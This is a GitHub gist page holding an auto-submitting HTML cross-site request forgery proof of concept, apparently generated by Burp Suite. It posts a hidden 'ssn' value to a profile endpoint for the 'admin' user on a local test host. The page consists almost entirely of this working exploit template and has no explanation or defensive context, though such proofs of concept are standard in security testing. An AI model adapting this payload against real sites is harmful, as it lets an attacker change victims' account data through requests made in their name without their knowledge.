Skip to content

Instantly share code, notes, and snippets.

@chilik
Created November 23, 2016 14:33
Show Gist options
  • Save chilik/b7ec16939e5f72632cf6050cda43b296 to your computer and use it in GitHub Desktop.
Save chilik/b7ec16939e5f72632cf6050cda43b296 to your computer and use it in GitHub Desktop.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://windows:5000/profile?_______________________________________________________________________________________________________________________________&user=admin" method="POST">
<input type="hidden" name="ssn" value="007" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment